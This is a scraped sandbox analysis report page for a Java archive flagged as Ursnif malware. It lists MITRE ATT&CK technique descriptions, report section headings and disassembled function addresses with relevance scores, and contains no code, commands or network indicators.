Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report presentation.jar

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 04D717A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 04DE2668, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Function 04D71566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 04D8B1C4, Relevance: 21.1, APIs: 14, Instructions: 109
memorythreadCOMMONLIBRARYCODE

Function 04D71E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 04D71CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 04D80100, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 192
COMMON

Function 04D715A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 04D71D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 04D89447, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Function 04D71C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Function 04D7146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 04D71F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 04D72485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON